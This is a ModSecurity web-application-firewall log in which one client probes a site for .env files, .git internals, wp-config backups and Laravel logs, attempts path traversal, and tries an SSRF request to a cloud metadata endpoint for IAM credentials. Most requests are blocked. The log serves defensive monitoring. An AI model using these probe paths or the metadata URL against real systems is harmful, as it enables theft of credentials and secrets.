[Tue May 12 04:39:00.130157 2026] [security2:error] [pid 1808852:tid 1808867] [client 45.148.10.166:49832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwxfeipD4uoG21FoiagAAAAw"]
[Tue May 12 04:39:00.157319 2026] [security2:error] [pid 1808852:tid 1808868] [client 45.148.10.166:50120] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKSxBfeipD4uoG21FoicAAAAA0"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:00.157548 2026] [security2:error] [pid 1808852:tid 1808868] [client 45.148.10.166:50120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKSxBfeipD4uoG21FoicAAAAA0"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:00.162873 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:49990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/app/.env"] [unique_id "agKSxM1tk6y7yBJLpJopewAAAJc"]
[Tue May 12 04:39:00.163085 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:49990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/.env"] [unique_id "agKSxM1tk6y7yBJLpJopewAAAJc"]
[Tue May 12 04:39:00.166954 2026] [security2:error] [pid 1808852:tid 1808867] [client 45.148.10.166:49832] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKSxBfeipD4uoG21FoicQAAAAw"]
[Tue May 12 04:39:00.167106 2026] [security2:error] [pid 1808852:tid 1808867] [client 45.148.10.166:49832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKSxBfeipD4uoG21FoicQAAAAw"]
[Tue May 12 04:39:00.170046 2026] [security2:error] [pid 1730207:tid 1730232] [client 45.148.10.166:49894] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.git/refs/heads/main"] [unique_id "agKSxDue9Sp-pIv_Bb61CgAAAVc"]
[Tue May 12 04:39:00.170186 2026] [security2:error] [pid 1730207:tid 1730232] [client 45.148.10.166:49894] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.git/refs/heads/main"] [unique_id "agKSxDue9Sp-pIv_Bb61CgAAAVc"]
[Tue May 12 04:39:00.307858 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.166:49962] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.git/config"] [unique_id "agKSxDue9Sp-pIv_Bb61CwAAAUE"]
[Tue May 12 04:39:00.308066 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.166:49962] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.git/config"] [unique_id "agKSxDue9Sp-pIv_Bb61CwAAAUE"]
[Tue May 12 04:39:00.311549 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.166:50190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/backend/.env"] [unique_id "agKSxHo6NvB9WXx5V-6ergAAAQg"], referer: https://tchatbooster.com/backend/.env
[Tue May 12 04:39:00.311726 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.166:50190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/backend/.env"] [unique_id "agKSxHo6NvB9WXx5V-6ergAAAQg"], referer: https://tchatbooster.com/backend/.env
[Tue May 12 04:39:00.406122 2026] [security2:error] [pid 1730207:tid 1730212] [client 45.148.10.166:50042] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwzue9Sp-pIv_Bb61AQAAAUM"], referer: https://tchatbooster.com/api/.env
[Tue May 12 04:39:00.418298 2026] [security2:error] [pid 1730175:tid 1730190] [client 45.148.10.166:50018] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKSxHo6NvB9WXx5V-6esAAAAQ0"], referer: https://tchatbooster.com/storage/../../../.env
[Tue May 12 04:39:00.418525 2026] [security2:error] [pid 1730175:tid 1730190] [client 45.148.10.166:50018] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKSxHo6NvB9WXx5V-6esAAAAQ0"], referer: https://tchatbooster.com/storage/../../../.env
[Tue May 12 04:39:00.433734 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.166:49908] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwzue9Sp-pIv_Bb60_gAAAVY"]
[Tue May 12 04:39:00.444307 2026] [security2:error] [pid 1730175:tid 1730193] [client 45.148.10.166:49852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwno6NvB9WXx5V-6epAAAARA"]
[Tue May 12 04:39:00.446779 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.166:49974] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "tchatbooster.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKSxBfeipD4uoG21FoicgAAABQ"]
[Tue May 12 04:39:00.447079 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.166:49974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKSxBfeipD4uoG21FoicgAAABQ"]
[Tue May 12 04:39:00.452083 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.166:49908] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php.txt"] [unique_id "agKSxDue9Sp-pIv_Bb61DwAAAVY"]
[Tue May 12 04:39:00.452229 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.166:49908] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php.txt"] [unique_id "agKSxDue9Sp-pIv_Bb61DwAAAVY"]
[Tue May 12 04:39:00.471877 2026] [security2:error] [pid 1730175:tid 1730193] [client 45.148.10.166:49852] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.git/index"] [unique_id "agKSxHo6NvB9WXx5V-6esQAAARA"]
[Tue May 12 04:39:00.472079 2026] [security2:error] [pid 1730175:tid 1730193] [client 45.148.10.166:49852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.git/index"] [unique_id "agKSxHo6NvB9WXx5V-6esQAAARA"]
[Tue May 12 04:39:00.488316 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.166:50206] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.git/logs/HEAD"] [unique_id "agKSxNr1yOh9TvizeziPpwAAAEA"]
[Tue May 12 04:39:00.488522 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.166:50206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.git/logs/HEAD"] [unique_id "agKSxNr1yOh9TvizeziPpwAAAEA"]
[Tue May 12 04:39:00.615732 2026] [security2:error] [pid 1820198:tid 1820210] [client 45.148.10.166:50056] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKSxM1tk6y7yBJLpJopfAAAAIo"], referer: https://tchatbooster.com/.env.local
[Tue May 12 04:39:00.615967 2026] [security2:error] [pid 1820198:tid 1820210] [client 45.148.10.166:50056] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKSxM1tk6y7yBJLpJopfAAAAIo"], referer: https://tchatbooster.com/.env.local
[Tue May 12 04:39:00.651401 2026] [core:error] [pid 1820198:tid 1820205] [client 45.148.10.166:49950] AH10244: invalid URI path (/../.env)
[Tue May 12 04:39:00.841752 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:50186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxM1tk6y7yBJLpJopegAAAII"], referer: https://tchatbooster.com/_next/image?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F&w=1200&q=75
[Tue May 12 04:39:00.859877 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:50186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.old"] [unique_id "agKSxM1tk6y7yBJLpJopfgAAAII"], referer: https://tchatbooster.com/.env.old
[Tue May 12 04:39:00.860179 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:50186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.old"] [unique_id "agKSxM1tk6y7yBJLpJopfgAAAII"], referer: https://tchatbooster.com/.env.old
[Tue May 12 04:39:00.897507 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:49866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw3o6NvB9WXx5V-6epgAAAQw"]
[Tue May 12 04:39:00.919093 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:49866] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env#"] [unique_id "agKSxHo6NvB9WXx5V-6eswAAAQw"]
[Tue May 12 04:39:00.919272 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:49866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env#"] [unique_id "agKSxHo6NvB9WXx5V-6eswAAAQw"]
[Tue May 12 04:39:00.954708 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.166:50024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw9r1yOh9TvizeziPpQAAAEM"], referer: https://tchatbooster.com/wp-config.php.bak
[Tue May 12 04:39:01.067255 2026] [security2:error] [pid 1730207:tid 1730223] [client 45.148.10.166:49910] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwzue9Sp-pIv_Bb61CAAAAU4"]
[Tue May 12 04:39:01.090873 2026] [security2:error] [pid 1730207:tid 1730223] [client 45.148.10.166:49910] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKSxTue9Sp-pIv_Bb61EAAAAU4"]
